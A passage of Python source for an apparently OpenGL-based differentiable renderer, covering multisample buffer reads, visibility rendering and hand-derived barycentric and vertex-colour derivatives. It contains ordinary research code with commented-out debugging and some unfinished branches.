# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
self.renders = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height']]).astype(np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in np.arange(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT),
np.uint32).reshape(self.frustum['height'], self.frustum['height'])[:, :].astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate(
[self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:, :, 0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0., 0., 0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
##Finally return image and derivatives
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Assumes camera is set up correctly in"""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
self.draw_visibility_image_ms(v, f)
# Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f) + 1)
fc = np.tile(fc.reshape((-1, 1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8) & 255
fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1, 3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
# Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1, 2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:, :, 0].ravel()[IS]
g = clr_im[:, :, 1].ravel()[IS]
b = clr_im[:, :, 2].ravel()[IS]
data = np.concatenate((r, g, b))
IS = np.concatenate((IS * 3, IS * 3 + 1, IS * 3 + 2))
JS = np.concatenate((JS * 3, JS * 3 + 1, JS * 3 + 2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
def compute_r(self):
return self.render()
@depends_on(dterms + terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms + terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
if self.updateRender:
render, residuals = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.residuals_result = residuals
self.updateRender = False
if self.imageGT is None:
returnResult = self.render_result
else:
returnResult = self.residuals_result
return returnResult
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
if self.overdraw:
# return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
derivatives_verts = common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
else:
derivatives_verts = common.dImage_wrt_2dVerts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'],
self.v.r.size / 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # # Check with autodiff:
# #
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
#
# dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# dp = dp[None, :]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:, 0:2] / p0[:, 2:3]
p1_proj = p1[:, 0:2] / p1[:, 2:3]
p2_proj = p2[:, 0:2] / p2[:, 2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1
u = p0[:, 0] / p0[:, 2]
v = p0[:, 1] / p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:, None], np.zeros([len(p0), 1]), (-p0[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p0), 1]), p0[:, 2][:, None], (-p0[:, 1] / v ** 2)[:, None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0] / p1[:, 2]
v = p1[:, 1] / p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:, None], np.zeros([len(p1), 1]), (-p1[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p1), 1]), p1[:, 2][:, None], (-p1[:, 1] / v ** 2)[:, None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0] / p2[:, 2]
v = p2[:, 1] / p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:, None], np.zeros([len(p2), 1]), (-p2[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p2), 1]), p2[:, 2][:, None], (-p2[:, 1] / v ** 2)[:, None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5 * np.linalg.norm(np.cross(p1 - p0, p2 - p0), axis=1)
nt_mag = A * 2
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
p = viewVerts
pre1 = -1 / (nt_mag[:, None] ** 2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dntdp0 = np.cross((p2 - p0)[:, None, :], -ident) + np.cross(-ident, (p1 - p0)[:, None, :])
dntdp1 = np.cross((p2 - p0)[:, None, :], ident)
dntdp2 = np.cross(ident, (p1 - p0)[:, None, :])
# Pol check this!:
dntnorm = (ident - np.einsum('ij,ik->ijk', nt_norm, nt_norm)) / nt_mag[:, None, None]
# dntnorm = (ident - np.einsum('ij,ik->ijk',nt_norm,nt_norm))/nt_mag[:,None,None]
dntnormdp0 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:, None]
db0part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2 - p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0 * b0
db0dp1wrtpart1 = dpart1p1 * b0
db0dp2wrtpart1 = dpart1p2 * b0
db0dp0wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p0
db0dp1wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p1
db0dp2wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0 - p2), -ident)
db1dp0wrtpart1 = dpart1p0 * b1
db1dp1wrtpart1 = dpart1p1 * b1
db1dp2wrtpart1 = dpart1p2 * b1
db1dp0wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p0
db1dp1wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p1
db1dp2wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0 * b2
db2dp1wrtpart1 = dpart1p1 * b2
db2dp2wrtpart1 = dpart1p2 * b2
db2dp0wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p0
db2dp1wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p1
db2dp2wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# If dealing with degenerate triangles, ignore that gradient.
# dp[nt_mag <= 1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc[vc > 1] = 1
vc[vc < 0] = 0
visTriVC = vc
dxdp = np.concatenate([dxdp_0[:, None, :], dxdp_1[:, None, :], dxdp_2[:, None, :]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
# output should be shape: VC x Ninput x Tri Points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
return didp
def compute_image(self, visible, visibility, f):
"""Construct a sparse jacobian that relates 2D projected vertex positions
(in the columns) to pixel values (in the rows). This can be done
in two steps."""
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape(
[nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:,(zerosIm*boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
# if self.debug:
# import pdb; pdb.set_trace()
# faces = f[sampleFaces].ravel()
# vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
# nv = len(vertsPerFaceProjBnd)
# p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
# p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
# p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
# t_area_bnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
# t_area_bnd[t_area_bnd > 1] = 1
# Trick to cap to 1 while keeping gradients.
p1 = vertsProjBndSamples.reshape([-1,2,2])[:, 0, :]
